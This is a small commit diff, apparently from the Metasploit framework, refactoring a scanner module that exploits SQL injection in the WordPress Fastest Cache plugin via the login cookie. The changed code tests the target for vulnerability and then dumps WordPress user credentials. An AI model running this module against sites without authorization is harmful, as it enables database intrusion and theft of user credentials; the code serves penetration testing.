Update

rapid7 · Oct 14, 2024 · a87e915 · a87e915
1 parent 37eeead
commit a87e915
Showing 1 changed file with 5 additions and 10 deletions.
diff --git a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -47,7 +47,7 @@ def initialize(info = {})
     ]
   end
 
-  def run_host(ip)
+  def run_host(_ip)
     print_status("Performing SQL injection via the 'wordpress_logged_in' cookie...")
 
     random_number = Rex::Text.rand_text_numeric(4..8)
@@ -63,15 +63,10 @@ def run_host(ip)
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end
 
-    wordpress_sqli_initialize(@sqli)
-
-    return print_bad("#{peer} - Testing of SQLi failed. If this is time-based, try increasing the SqliDelay.") unless @sqli.test_vulnerable
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.') unless @sqli.test_vulnerable
+    print_good('Target is vulnerable to SQLi!')
 
-    table_prefix = wordpress_sqli_identify_table_prefix
-    unless table_prefix
-      fail_with(Failure::NotFound, 'Failed to identify the WordPress table prefix.')
-    end
-
-    wordpress_sqli_get_users_credentials(table_prefix, ip, datastore['COUNT'])
+    wordpress_sqli_initialize(@sqli)
+    wordpress_sqli_get_users_credentials(datastore['COUNT'])
   end
 end